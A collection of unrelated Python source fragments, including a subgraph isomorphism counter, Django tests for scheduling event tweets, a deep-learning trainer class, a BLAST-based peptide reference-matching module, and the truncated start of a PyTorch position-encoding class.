self.assertEqual(
scheme.description, str(dialog.editor.desc_edit.toPlainText()).strip()
)
|
1696649
|
from ..filters import run_filters, cheap_filters, all_filters
from ..utils.misc import invert, values_map_to_same_key, one_hot
from ..utils.graph_ops import get_node_cover
from .alldiffs import count_alldiffs
import numpy as np
from functools import reduce
# TODO: count how many isomorphisms each background node participates in.
# TODO: switch from recursive to iterative implementation for readability
n_iterations = 0
def recursive_isomorphism_counter(tmplt, world, candidates, *,
unspec_cover, verbose, init_changed_cands, count_iterations=False):
global n_iterations
n_iterations += 1
# If the node cover is empty, the unspec nodes are disconnected. Thus, we
# can skip straight to counting solutions to the alldiff constraint problem
if len(unspec_cover) == 0:
# Elimination filter is not needed here and would be a waste of time
tmplt, world, candidates = run_filters(tmplt, world, candidates=candidates, filters=cheap_filters,
verbose=False, init_changed_cands=init_changed_cands)
node_to_cands = {node: world.nodes[candidates[idx]]
for idx, node in enumerate(tmplt.nodes)}
return count_alldiffs(node_to_cands)
tmplt, world, candidates = run_filters(tmplt, world, candidates=candidates, filters=all_filters,
verbose=False, init_changed_cands=init_changed_cands)
# Since the node cover is not empty, we first choose some valid
# assignment of the unspecified nodes one at a time until the remaining
# unspecified nodes are disconnected.
n_isomorphisms = 0
node_idx = unspec_cover[0]
cand_idxs = np.argwhere(candidates[node_idx]).flat
for i, cand_idx in enumerate(cand_idxs):
candidates_copy = candidates.copy()
candidates_copy[node_idx] = one_hot(cand_idx, world.n_nodes)
# recurse to make assignment for the next node in the unspecified cover
n_isomorphisms += recursive_isomorphism_counter(
tmplt, world, candidates_copy, unspec_cover=unspec_cover[1:],
verbose=verbose, init_changed_cands=one_hot(node_idx, tmplt.n_nodes), count_iterations=count_iterations)
# TODO: more useful progress summary
if verbose:
print("depth {}: {} of {}".format(len(unspec_cover), i, len(cand_idxs)), n_isomorphisms)
return n_isomorphisms
def count_isomorphisms(tmplt, world, *, candidates=None, verbose=True, count_iterations=False):
"""
counts the number of ways to assign template nodes to world nodes such that
edges between template nodes also appear between the corresponding world
nodes. Does not factor in the number of ways to assign the edges. Only
counts the number of assignments between nodes.
if the set of unspecified template nodes is too large or too densely
connected, this code may never finish.
"""
global n_iterations
n_iterations = 0
if candidates is None:
tmplt, world, candidates = uclasm.run_filters(
tmplt, world, filters=uclasm.all_filters, verbose=verbose)
unspec_nodes = np.where(candidates.sum(axis=1) > 1)[0]
tmplt_subgraph = tmplt.subgraph(unspec_nodes)
unspec_cover = get_node_cover(tmplt_subgraph)
unspec_cover_nodes = [tmplt_subgraph.nodes[node_idx] for node_idx in unspec_cover]
unspec_cover_idxes = [tmplt.node_idxs[node] for node in unspec_cover_nodes]
# Send zeros to init_changed_cands since we already just ran the filters
count = recursive_isomorphism_counter(
tmplt, world, candidates, verbose=verbose, unspec_cover=unspec_cover_idxes,
init_changed_cands=np.zeros(tmplt.nodes.shape, dtype=np.bool), count_iterations=count_iterations)
if count_iterations:
return count, n_iterations
else:
return count
def recursive_isomorphism_finder(tmplt, world, candidates, *,
unspec_node_idxs, verbose, init_changed_cands,
found_isomorphisms):
if len(unspec_node_idxs) == 0:
# All nodes have been assigned, add the isomorphism to the list
new_isomorphism = {}
for tmplt_idx, tmplt_node in enumerate(tmplt.nodes):
if verbose:
print(str(tmplt_node)+":", world.nodes[candidates[tmplt_idx]])
new_isomorphism[tmplt_node] = world.nodes[candidates[tmplt_idx]][0]
found_isomorphisms.append(new_isomorphism)
return found_isomorphisms
tmplt, world, candidates = run_filters(tmplt, world, candidates=candidates,
filters=all_filters, verbose=False,
init_changed_cands=init_changed_cands)
node_idx = unspec_node_idxs[0]
cand_idxs = np.argwhere(candidates[node_idx]).flat
for i, cand_idx in enumerate(cand_idxs):
candidates_copy = candidates.copy()
candidates_copy[node_idx] = one_hot(cand_idx, world.n_nodes)
# recurse to make assignment for the next node in the unspecified cover
recursive_isomorphism_finder(
tmplt, world, candidates_copy,
unspec_node_idxs=unspec_node_idxs[1:],
verbose=verbose,
init_changed_cands=one_hot(node_idx, tmplt.n_nodes),
found_isomorphisms=found_isomorphisms)
return found_isomorphisms
def find_isomorphisms(tmplt, world, *, candidates=None, verbose=True):
""" Returns a list of isomorphisms as dictionaries mapping template nodes to
world nodes. Note: this is much slower than counting, and should only be
done for small numbers of isomorphisms and fully filtered candidate matrices
"""
if candidates is None:
tmplt, world, candidates = uclasm.run_filters(
tmplt, world, filters=uclasm.all_filters, verbose=verbose)
unspec_node_idxs = np.where(candidates.sum(axis=1) > 1)[0]
found_isomorphisms = []
return recursive_isomorphism_finder(
tmplt, world, candidates, verbose=verbose,
unspec_node_idxs=unspec_node_idxs,
init_changed_cands=np.zeros(tmplt.nodes.shape, dtype=np.bool),
found_isomorphisms=found_isomorphisms)
def print_isomorphisms(tmplt, world, *, candidates=None, verbose=True):
""" Prints the list of isomorphisms """
print(find_isomorphisms(tmplt, world, candidates=candidates,
verbose=verbose))
|
1696664
|
import datetime
import json
from nose.tools import eq_, ok_
import mock
from django.conf import settings
from django.contrib.auth.models import Group
from django.utils import timezone
from django.core.urlresolvers import reverse
from airmozilla.main.models import (
Event,
EventTweet,
Location,
Approval
)
from .base import ManageTestCase
from airmozilla.base.tests.test_utils import Response
class TestEventTweets(ManageTestCase):
event_base_data = {
'status': Event.STATUS_SCHEDULED,
'description': '...',
'privacy': 'public',
'location': '1',
'channels': '1',
'tags': 'xxx',
'template': '1',
'start_time': '2012-3-4 12:00',
'estimated_duration': '3600',
'timezone': 'US/Pacific'
}
placeholder = 'airmozilla/manage/tests/firefox.png'
@mock.patch('requests.get')
def test_prepare_new_tweet(self, rget):
def mocked_read(url, params):
assert url == settings.BITLY_URL
return Response({
u'status_code': 200,
u'data': {
u'url': u'http://mzl.la/1adh2wT',
u'hash': u'1adh2wT',
u'global_hash': u'1adh2wU',
u'long_url': u'https://air.mozilla.org/it-buildout/',
u'new_hash': 0
},
u'status_txt': u'OK'
})
rget.side_effect = mocked_read
event = Event.objects.get(title='Test event')
# the event must have a real placeholder image
with open(self.placeholder) as fp:
response = self.client.post(
reverse('manage:event_edit', args=(event.pk,)),
dict(self.event_base_data,
title=event.title,
short_description="Check out <b>This!</b>",
description="Something longer",
placeholder_img=fp)
)
assert response.status_code == 302, response.status_code
# on the edit page, there should be a link
response = self.client.get(
reverse('manage:event_edit', args=(event.pk,))
)
assert response.status_code == 200
url = reverse('manage:new_event_tweet', args=(event.pk,))
ok_(url in response.content)
response = self.client.get(url)
eq_(response.status_code, 200)
textarea = (
response.content
.split('<textarea')[1]
.split('>')[1]
.split('</textarea')[0]
)
ok_(textarea.strip().startswith('Check out This!'))
event = Event.objects.get(pk=event.pk)
event_url = 'http://testserver'
event_url += reverse('main:event', args=(event.slug,))
ok_('http://mzl.la/1adh2wT' in textarea)
ok_(event_url not in textarea)
# Sometimes, due to...
# https://bugzilla.mozilla.org/show_bug.cgi?id=1167211
# the session is cleared out here in this test, so we
# really make sure we're signed in
assert self.client.login(username='fake', password='<PASSWORD>')
assert self.client.session.items()
# load the form
response = self.client.get(url)
eq_(response.status_code, 200)
# try to submit it with longer than 140 characters
response = self.client.post(url, {
'text': 'x' * 141,
'include_placeholder': True,
})
eq_(response.status_code, 200)
assert not EventTweet.objects.all().count()
ok_('it has 141' in response.content)
# try again
response = self.client.post(url, {
'text': 'Bla bla #tag',
'include_placeholder': True,
})
eq_(response.status_code, 302)
ok_(EventTweet.objects.all().count())
now = timezone.now()
event_tweet, = EventTweet.objects.all()
# To avoid being unlucky about the second ticking over
# just before we compare these, make it OK to be up to 2 seconds
# apart.
diff = abs(event_tweet.send_date - now)
ok_(diff < datetime.timedelta(seconds=2))
ok_(not event_tweet.sent_date)
ok_(not event_tweet.error)
ok_(not event_tweet.tweet_id)
@mock.patch('requests.get')
def test_prepare_new_tweet_on_future_event(self, rget):
def mocked_read(url, params):
assert url == settings.BITLY_URL
return Response({
u'status_code': 200,
u'data': {
u'url': u'http://mzl.la/1adh2wT',
u'hash': u'1adh2wT',
u'global_hash': u'1adh2wU',
u'long_url': u'https://air.mozilla.org/it-buildout/',
u'new_hash': 0
},
u'status_txt': u'OK'
})
rget.side_effect = mocked_read
event = Event.objects.get(title='Test event')
event.start_time = timezone.now() + datetime.timedelta(days=10)
event.save()
assert event.is_scheduled()
assert event.location
assert event.location.timezone
# on the edit page, there should be a link
url = reverse('manage:new_event_tweet', args=(event.pk,))
response = self.client.get(url)
eq_(response.status_code, 200)
help_text_part = 'This event starts %s' % (
event.location_time.strftime('%Y-%m-%d %H:%M')
)
ok_(help_text_part in response.content)
def test_edit_event_tweet(self):
event = Event.objects.get(title='Test event')
assert event.location and event.location.timezone == 'US/Pacific'
tomorrow = timezone.now() + datetime.timedelta(days=1)
tweet = EventTweet.objects.create(
event=event,
text='Something something',
creator=self.user,
include_placeholder=True,
send_date=tomorrow,
)
url = reverse('manage:edit_event_tweet', args=(event.id, tweet.id))
response = self.client.get(url)
eq_(response.status_code, 200)
ok_('Something something' in response.content)
# tz = pytz.timezone(event.location.timezone)
data = {
'text': 'Different Bla ',
'include_placeholder': True,
'send_date': tweet.send_date.strftime('%Y-%m-%d %H:%M'),
}
response = self.client.post(url, data)
eq_(response.status_code, 302)
tweet = EventTweet.objects.get(id=tweet.id)
eq_(tweet.text, 'Different Bla')
# because we round but they won't be equal, but close
ok_(abs(tomorrow - tweet.send_date) <= datetime.timedelta(hours=1))
def test_event_tweets_empty(self):
event = Event.objects.get(title='Test event')
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.get(url)
eq_(response.status_code, 200)
def test_event_tweets_states(self):
event = Event.objects.get(title='Test event')
assert event in Event.objects.approved()
group = Group.objects.create(name='testapprover')
Approval.objects.create(
event=event,
group=group,
)
assert event not in Event.objects.approved()
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.get(url)
eq_(response.status_code, 200)
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
)
response = self.client.get(url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
ok_('Needs to be approved first' in response.content)
from airmozilla.main.templatetags.jinja_helpers import js_date
ok_(
js_date(tweet.send_date.replace(microsecond=0))
not in response.content
)
# also check that 'Bla bla' is shown on the Edit Event page
edit_url = reverse('manage:event_edit', args=(event.pk,))
response = self.client.get(edit_url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
tweet.tweet_id = '1234567890'
tweet.sent_date = (
timezone.now() -
datetime.timedelta(days=1)
)
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
ok_(
'https://twitter.com/%s/status/1234567890'
% settings.TWITTER_USERNAME
in response.content
)
ok_(
js_date(tweet.sent_date.replace(microsecond=0))
in response.content
)
tweet.tweet_id = None
tweet.error = "Some error"
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
ok_(
'https://twitter.com/%s/status/1234567890'
% settings.TWITTER_USERNAME
not in response.content
)
ok_(
js_date(tweet.sent_date.replace(microsecond=0))
in response.content
)
ok_('Failed to send' in response.content)
def test_all_event_tweets_states(self):
event = Event.objects.get(title='Test event')
assert event in Event.objects.approved()
group = Group.objects.create(name='testapprover')
Approval.objects.create(
event=event,
group=group,
)
assert event not in Event.objects.approved()
url = reverse('manage:all_event_tweets_data')
response = self.client.get(url)
eq_(response.status_code, 200)
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
)
response = self.client.get(url)
eq_(response.status_code, 200)
data = json.loads(response.content)
first_tweet, = data['tweets']
eq_(first_tweet['text'], 'Bla bla')
ok_(first_tweet['event']['_needs_approval'])
# also check that 'Bla bla' is shown on the Edit Event page
edit_url = reverse('manage:event_edit', args=(event.pk,))
response = self.client.get(edit_url)
eq_(response.status_code, 200)
ok_('Bla bla' in response.content)
tweet.tweet_id = '1234567890'
tweet.sent_date = timezone.now() - datetime.timedelta(days=1)
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
data = json.loads(response.content)
first_tweet, = data['tweets']
tweet_url = (
'https://twitter.com/%s/status/1234567890'
% settings.TWITTER_USERNAME
)
eq_(first_tweet['full_tweet_url'], tweet_url)
tweet.tweet_id = None
tweet.error = "Some error"
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
data = json.loads(response.content)
first_tweet, = data['tweets']
ok_('full_tweet_url' not in first_tweet)
ok_('creator' not in first_tweet)
assert self.user.email
tweet.creator = self.user
tweet.save()
response = self.client.get(url)
eq_(response.status_code, 200)
data = json.loads(response.content)
first_tweet, = data['tweets']
eq_(first_tweet['creator'], {'email': self.user.email})
@mock.patch('airmozilla.manage.views.events.send_tweet')
def test_force_send_now(self, mocked_send_tweet):
event = Event.objects.get(title='Test event')
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
)
def mock_send_tweet(event_tweet):
event_tweet.tweet_id = '1234567890'
event_tweet.save()
mocked_send_tweet.side_effect = mock_send_tweet
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.post(url, {
'send': tweet.pk,
})
eq_(response.status_code, 302)
tweet = EventTweet.objects.get(pk=tweet.pk)
eq_(tweet.tweet_id, '1234567890')
def test_view_tweet_error(self):
event = Event.objects.get(title='Test event')
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
error='Crap!'
)
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.post(url, {
'error': tweet.pk,
})
eq_(response.status_code, 200)
eq_(response['content-type'], 'text/plain')
ok_('Crap!' in response.content)
def test_cancel_event_tweet(self):
event = Event.objects.get(title='Test event')
tweet = EventTweet.objects.create(
event=event,
text='Bla bla',
send_date=timezone.now(),
)
url = reverse('manage:event_tweets', args=(event.pk,))
response = self.client.post(url, {
'cancel': tweet.pk,
})
eq_(response.status_code, 302)
ok_(not EventTweet.objects.all().count())
def test_create_event_tweet_with_location_timezone(self):
event = Event.objects.get(title='Test event')
event.location = Location.objects.create(
name='Paris',
timezone='Europe/Paris'
)
event.save()
# the event must have a real placeholder image
with open(self.placeholder) as fp:
response = self.client.post(
reverse('manage:event_edit', args=(event.pk,)),
dict(self.event_base_data,
title=event.title,
short_description="Check out <b>This!</b>",
description="Something longer",
placeholder_img=fp)
)
assert response.status_code == 302, response.status_code
url = reverse('manage:new_event_tweet', args=(event.pk,))
now = datetime.datetime.utcnow()
response = self.client.post(url, {
'text': 'Bla bla #tag',
'include_placeholder': True,
'send_date': now.strftime('%Y-%m-%d 12:00'),
})
eq_(response.status_code, 302)
event_tweet, = EventTweet.objects.all()
# we specified it as noon in Paris, but the save time
# will be UTC
ok_(event_tweet.send_date.hour != 12)
assert event_tweet.send_date.strftime('%Z') == 'UTC'
|
1696679
|
from torch import optim
from contextlib import contextmanager
class Trainer:
r"""Abstract base class for training models.
The Trainer class makes it incredibly simple and convinient to train,
monitor, debug and checkpoint entire Deep Learning projects.
Simply define your training loop by
implementing the :py:meth:`optimize` method.
Args:
models (list of :py:class:`nn.Module`): All the models that need
to be trained
optimizers (list of :py:class:`optim.Optimizer`): Any optimizers that
are used
.. note::
If any model is in eval() model, the trainer is *set off*.
This means that as per protocol, *all* models will not train.
Attributes:
callbacks (list): A list of callbacks attached to the trainer.
Take a look at :py:class:`SupervisedTrainer` for an idea on how to extend this class.
"""
def __init__(self, models, optimizers):
self.models = models
self.optimizers = optimizers
self.parameters = set()
self.register_parameter('iterations', 0)
def optimize(self):
r""" Defines the core optimization loop.
This method is called on each iteration.
Two quick protocols that one needs to follow are:
1. **Do NOT** actually backpropagate or step() the optimizers if the
trainer is not training. Use the :py:meth:`is_training` method
to find out.
This is essential since this will ensure that the trainer behaves
as expected when :py:meth:`is_training` is ``False``.
Useful, for example, in cases like :py:class:`callbacks.ColdStart`
2. Send a callback the signal ``'gradient'`` with a keyword argument
``'models'`` that is the list of models that accumulate a gradient.
Usually, it's all the modules (``self.modules``).
Any callbacks that listen to this signal are interested in the gradient
information (eg. ``callbacks.Babysitter``).
"""
raise NotImplementedError
def train(self, dataloader, epochs=1, callbacks=None, **kwargs):
r"""Starts the training process.
Args:
dataloader (``DataLoader``): The MagNet dataloader that iterates
over the training set
epochs (float or int): The number of epochs to train for.
Default: ``1``
callbacks (list): Any callbacks to be attached. Default: ``None``
Keyword Args:
iterations (int): The number of iterations to train for.
Overrides :attr:`epochs`.
.. note::
PyTorch ``DataLoader`` s are not supported.
Ideally, encapsulate your dataset in the ``Data`` class.
"""
from magnet.training.callbacks import CallbackQueue
self.dataloader = dataloader
if callbacks is None: callbacks = []
self.callbacks = CallbackQueue(callbacks)
total_iterations = kwargs.get('iterations', int(epochs * len(dataloader)))
self.callbacks('on_training_start', trainer=self, total_iterations=total_iterations)
for self.iterations in range(self.iterations, self.iterations + total_iterations): next(self)
self.callbacks('on_training_end', trainer=self)
def __iter__(self):
return self
def __next__(self):
self.callbacks('on_batch_start', trainer=self)
self.optimize()
self.callbacks('on_batch_end', trainer=self)
@contextmanager
def mock(self, path=None):
r"""A context manager that creates a temporary *'safe'* scope for training.
All impact to stateful objects (models, optimizers and the
trainer itself) are forgotten once out of this scope.
This is very useful if you need to try out *what-if experiments*.
Args:
path (pathlib.Path): The path to save temporary states into
Default: ``{System temp directory}/.mock_trainer``
"""
from shutil import rmtree
if path is None:
from pathlib import Path
from tempfile import gettempdir
path = Path(gettempdir()) / '.mock_trainer'
rmtree(path, ignore_errors=True) # Remove any existing directory
self.save_state(path)
try:
yield
finally:
self.load_state(path)
rmtree(path)
def epochs(self, mode=None):
r"""The number of epochs completed.
Args:
mode (str or None): If the mode is ``'start'`` or ``'end'``, a
boolean is returned signalling if it's the start or end of an epoch
"""
if mode is None:
return self.iterations / len(self.dataloader)
if mode == 'start':
return (self.iterations / len(self.dataloader)).is_integer()
if mode == 'end':
return ((self.iterations + 1) / len(self.dataloader)).is_integer()
def is_training(self):
return all(model.training for model in self.models)
def load_state(self, path):
from magnet.training.utils import load_state, load_object
for i, model in enumerate(self.models): load_state(model, path / 'models', alternative_name=str(i))
for i, optimizer in enumerate(self.optimizers): load_state(optimizer, path / 'optimizers', alternative_name=str(i))
state_dict = load_object(path / 'state.p', default={})
for attr, val in state_dict.items(): self.register_parameter(attr, val)
try: self.callbacks('load_state', trainer=self, path=path / 'callbacks')
except AttributeError: pass
try: self.dataloader.load_state_dict(path / 'dataloader.p')
except AttributeError: pass
def save_state(self, path):
from magnet.training.utils import save_state, save_object
for i, model in enumerate(self.models): save_state(model, path / 'models', alternative_name=str(i))
for i, optimizer in enumerate(self.optimizers): save_state(optimizer, path / 'optimizers', alternative_name=str(i))
state_dict = {attr: getattr(self, attr) for attr in self.parameters}
save_object(state_dict, path / 'state.p')
try: self.callbacks('save_state', trainer=self, path=path / 'callbacks')
except AttributeError: pass
try: self.dataloader.save_state_dict(path / 'dataloader.p')
except AttributeError: pass
def register_parameter(self, name, value):
r"""Use this to register *'stateful'* parameters that are serialized
"""
setattr(self, name, value)
self.parameters.add(name)
class SupervisedTrainer(Trainer):
r"""A simple trainer that implements a supervised approach where a simple
model :math:`\hat{y} = f(x)` is trained to map :math:`\hat{y}` to
ground-truth :math:`y` according to some specified loss.
This is the training routine that most high-level deep learning frameworks
implement.
Args:
model (``nn.Module``): The model that needs to be trained
optimizer (str or optim.Optimzer): The optimizer used to train
the model. Default: ``'adam'``
loss (str or ``callable``): A loss function that gives the objective
to be minimized. Default: ``'cross_entropy'``
metrics (list): Any other metrics that need to be monitored.
Default: ``None``
* :attr:`optimizer` can be an actual ``optim.Optimizer`` instance or the
name of a popular optimzizer (eg. ``'adam'``).
* :attr:`loss` can be a function or the name of a popular
loss function (eg. ``'cross_entropy'``).
It should accept 2 arguments (:math:`\hat{y}`, :math:`y`).
* :attr:`metrics` should contain a list of functions which accept
2 arguments (:math:`\hat{y}`, :math:`y`), like the loss function.
.. note::
A static :py:meth:`validate` function is provided for the
validation callback
.. note::
The :attr:`metrics` is of no use unless there is some
callback (eg.``callbacks.Monitor``) to receive the metrics
Examples::
>>> import magnet as mag
>>> import magnet.nodes as mn
>>> from magnet.data import Data
>>> from magnet.training import callbacks, SupervisedTrainer
>>> data = Data.get('mnist')
>>> model = mn.Linear(10, act=None)
>>> model.build(x=next(data())[0])
>>> trainer = SupervisedTrainer(model)
>>> callbacks=[callbacks.Monitor(),
callbacks.Validate(data(64, mode='val'), SupervisedTrainer.validate)]
>>> trainer.train(data(64, shuffle=True), 1, callbacks)
"""
def __init__(self, model, optimizer='adam', loss='cross_entropy', metrics=None):
from magnet.nodes.functional import wiki
if isinstance(optimizer, str): optimizer = optimizer_wiki[optimizer.lower()](model.parameters())
if isinstance(loss, str): loss = wiki['losses'][loss.lower()]
if metrics is None: metrics = []
if not isinstance(metrics, (tuple, list)): metrics = [metrics]
for i, metric in enumerate(metrics):
if isinstance(metric, str): metrics[i] = (metric, wiki['metrics'][metric.lower()])
super().__init__([model], [optimizer])
self.loss = loss
self.metrics = metrics
def optimize(self):
optimizer = self.optimizers[0]
loss = self.get_loss(self.dataloader)
# Protocol 1: Backprop and step() only if trainer is training
if self.is_training():
loss.backward()
# Protocol 2: Broadcast the models that accumulate the gradient
# using signal 'gradient' before clearing them.
self.callbacks('gradient', trainer=self, models=self.models)
optimizer.step()
optimizer.zero_grad()
@staticmethod
def validate(trainer, dataloader):
r"""Static helper method to validate models in :attr:`trainer` against
data in :attr:`dataloader`.
Can be passed to ``callbacks.Validate()``.
"""
trainer.get_loss(dataloader, validation=True)
def get_loss(self, dataloader, validation=False):
r"""Utility function that returns the loss and broadcasts metrics.
"""
def write_stats(key, value):
self.callbacks('write_stats', trainer=self, key=key, value=value, validation=validation, buffer_size=len(dataloader))
model = self.models[0]
x, y = next(dataloader)
y_pred = model(x)
loss = self.loss(y_pred, y)
# Broadcast the loss and any other metrics using the 'write_stats' signal.
write_stats('loss', loss.item())
for metric in self.metrics: write_stats(metric[0], metric[1](y_pred, y).item())
return loss
def finish_training(path, names=None):
r""" A helper function for cleaning up the training logs and other
checkpoints and retaining only the state_dicts of the trained models.
Args:
path (pathlib.Path): The path where the trainer was checkpointed
names (list): The names of the models in the order given to the trainer.
Default: ``None``
* :attr:`names` can be used if the models themselves did not have names
prior to training.
The checkpoints default to an ordered naming scheme.
If passed, the files are additionally renamed to these names.
.. note::
Does nothing / fails silently if the path does not exist.
Example::
>>> # Assume that we've defined two models - encoder and decoder,
>>> # and a suitable trainer. The models do not have a 'name' attribute.
>>> trainer.save_state(checkpoint_path / 'my-trainer')
>>> # Suppose the checkpoint directory contains the following files:
>>> # my-trainer/
>>> # models/
>>> # 0.pt
>>> # 1.pt
>>> # callbacks/
>>> # monitor/
>>> # babysitter/
>>> # state.p
>>> finish_training(path, names=['encoder', 'decoder'])
>>> # Now the directory contains these files:
>>> # encoder.pt
>>> # decoder.pt
"""
if not path.exists(): return
import shutil
if isinstance(names, str): names = [names]
filenames = list((path / 'models').glob('*.pt'))
if names is None: names = [filename.stem for filename in filenames]
for name, filename in zip(names, filenames):
shutil.move(filename, path.parent / (name + '.pt'))
shutil.rmtree(path)
optimizer_wiki = {'adam': optim.Adam}
|
1696733
|
import csv
from Bio.Blast import NCBIWWW
from Bio.Blast import NCBIXML
from Bio import SeqIO
import shutil
import re
import os
from collections import defaultdict
from time import sleep
class CalculateReferenceProteomeSimilarity:
def __init__(self, input_file, input_fasta, output_file, match_length=8, species='human', file_type='vcf'):
self.input_file = input_file
self.input_fasta = input_fasta
self.output_file = output_file
self.metric_file = "{}.reference_matches".format(output_file)
self.match_length = match_length
self.species = species
self.file_type = file_type
self.species_to_organism = {
'human': 'Homo sapiens',
'atlantic salmon': 'Salmo salar',
'black-headed spider monkey': 'Ateles fusciceps',
'blue monkey': 'Cercopithecus mitis',
'bonobo': 'Pan paniscus',
'bornean orangutan': 'Pongo pygmaeus',
'brown-mantled tamarin': 'Saguinus fuscicollis',
'chimpanzee': 'Pan troglodytes',
'common marmoset': 'Callithrix jacchus',
'common squirrel monkey': 'Saimiri sciureus',
'cottontop tamarin': 'Saguinus oedipus',
'cow': 'Bos taurus',
'crab-eating macaque': 'Macaca fascicularis',
'dog': 'Canis lupus familiaris',
"Geoffroy's tamarin": 'Saguinus geoffroyi',
'golden lion tamarin': 'Leontopithecus rosalia',
'gorilla': 'Gorilla gorilla',
'grivet': 'Chlorocebus aethiops',
'hamadryas baboon': 'Papio hamadryas',
'horse': 'Equus caballus',
'lar gibbon': 'Hylobates lar',
'mouse': 'Mus musculus',
'moustached tamarin': 'Saguinus mystax',
'olive baboon': 'Papio anubis',
'pig': 'Sus scrofa',
'rainbow trout': 'Oncorhynchus mykiss',
'rhesus macaque': 'Macaca mulatta',
'sheep': 'Ovis aries',
'southern pig-tailed macaque': 'Macaca nemestrina',
'stump-tailed macaque': 'Macaca arctoides',
'white-faced saki': 'Pithecia pithecia',
'white-fronted spider monkey': 'Ateles belzebuth',
'yellow baboon': 'Papio cynocephalus',
}
def reference_match_headers(self):
return [
'Reference Match',
]
def get_mt_peptides(self):
records = list(SeqIO.parse(self.input_fasta, "fasta"))
if self.file_type == 'vcf':
records_dict = {x.id.replace('MT.', ''): str(x.seq) for x in filter(lambda x: x.id.startswith('MT.'), records)}
else:
records_dict = {x.id: str(x.seq) for x in records}
return records_dict
def get_wt_peptides(self):
if self.file_type == 'vcf':
records = list(SeqIO.parse(self.input_fasta, "fasta"))
records_dict = {x.id.replace('WT.', ''): str(x.seq) for x in filter(lambda x: x.id.startswith('WT.'), records)}
else:
return {}
return records_dict
def extract_n_mer(self, full_peptide, subpeptide_position, mutation_position, mt_length):
#For non-frameshifts this ensures that we only test match_length epitopes that overlap the mutation
#If we extract a larger region, we will get false-positive matches against the reference proteome
#from the native wildtype portion of the peptide
flanking_sequence_length = self.match_length - 1
mt_start = (subpeptide_position-1) + (mutation_position-1)
start = mt_start - flanking_sequence_length
if start < 0:
start = 0
end = mt_start + mt_length + flanking_sequence_length
return full_peptide[start:end]
def extract_n_mer_from_fs(self, full_peptide, wt_peptide, epitope, subpeptide_position):
#For frameshifts we want to test all downstream epitopes in the flanking region since they are all potentially novel
flanking_sequence_length = self.match_length - 1
start = subpeptide_position - 1 - flanking_sequence_length
if start < 0:
start = 0
#This catches cases where the start position would cause too many leading wildtype amino acids, which would result
#in false-positive reference matches
if len(full_peptide) > len(wt_peptide):
diff_position = [i for i in range(len(wt_peptide)) if wt_peptide[i] != full_peptide[i]][0]
else:
diff_position = [i for i in range(len(full_peptide)) if wt_peptide[i] != full_peptide[i]][0]
min_start = diff_position - self.match_length + 1
if min_start > start:
start = min_start
end = start + flanking_sequence_length + len(epitope) + flanking_sequence_length
return full_peptide[start:end]
def metric_headers(self):
return ['Chromosome', 'Start', 'Stop', 'Reference', 'Variant', 'Transcript', 'Peptide', 'Hit ID', 'Hit Definition', 'Query Sequence', 'Match Sequence', 'Match Start', 'Match Stop']
def execute(self):
if self.species not in self.species_to_organism:
print("Species {} not supported for Reference Proteome Similarity search. Skipping.".format(self.species))
shutil.copy(self.input_file, self.output_file)
return
mt_records_dict = self.get_mt_peptides()
wt_records_dict = self.get_wt_peptides()
with open(self.input_file) as input_fh, open(self.output_file, 'w') as output_fh, open(self.metric_file, 'w') as metric_fh:
reader = csv.DictReader(input_fh, delimiter="\t")
writer = csv.DictWriter(output_fh, delimiter="\t", fieldnames=reader.fieldnames + self.reference_match_headers(), extrasaction='ignore')
metric_writer = csv.DictWriter(metric_fh, delimiter="\t", fieldnames=self.metric_headers(), extrasaction='ignore')
writer.writeheader()
metric_writer.writeheader()
processed_peptides = []
reference_match_dict = defaultdict(list)
for line in reader:
if self.file_type == 'pVACbind':
epitope = line['Epitope Seq']
peptide = mt_records_dict[line['Mutation']]
else:
epitope = line['MT Epitope Seq']
if self.file_type == 'vcf':
if line['Variant Type'] == 'FS':
peptide = self.extract_n_mer_from_fs(mt_records_dict[line['Index']], wt_records_dict[line['Index']], epitope, int(line['Sub-peptide Position']))
else:
mt_amino_acids = line['Mutation'].split('/')[1]
if mt_amino_acids == '-':
mt_amino_acids = ''
peptide = self.extract_n_mer(mt_records_dict[line['Index']], int(line['Sub-peptide Position']), int(line['Mutation Position']), len(mt_amino_acids))
else:
peptide = mt_records_dict[line['Index']]
if peptide not in processed_peptides:
processed_peptides.append(peptide)
result_handle = NCBIWWW.qblast("blastp", "refseq_protein", peptide, entrez_query="{} [Organism]".format(self.species_to_organism[self.species]), word_size=min(self.match_length, 7), gapcosts='32767 32767')
for blast_record in NCBIXML.parse(result_handle):
if len(blast_record.alignments) > 0:
for alignment in blast_record.alignments:
for hsp in alignment.hsps:
matches = re.split('\+| ', hsp.match)
for match in matches:
if len(match) >= self.match_length:
reference_match_dict[peptide].append({
'Hit ID': alignment.hit_id,
'Hit Definition': alignment.hit_def,
'Query Sequence': hsp.query,
'Match Sequence': hsp.match,
'Match Start': hsp.sbjct_start,
'Match Stop': hsp.sbjct_end,
})
sleep(10)
if peptide in reference_match_dict:
line['Reference Match'] = True
metric_line = line.copy()
metric_line['Peptide'] = peptide
for alignment in reference_match_dict[peptide]:
metric_line.update(alignment)
metric_writer.writerow(metric_line)
else:
line['Reference Match'] = False
writer.writerow(line)
|
1696745
|
import math
import torch
import torch.nn as nn
class PositionEncoding(nn.Module):
"""
Add positional information to input tensor.
:Examples:
>>> model = PositionEncoding(d_model=6, max_len=10, dropout=0)
>>> test_input1 = torch.zeros(3, 10, 6)
>>> output1 = model(test_input1)
>>> output1.size()
>>> test_input2 = torch.zeros(5, 3, 9, 6)
>>> output2 = model(test_input2)
>>> output2.size()
"""
def __init__(self, n_filters=128, max_len=500):
"""
:param n_filters: same with input hidden size
:param max_len: maximum sequence length
"""
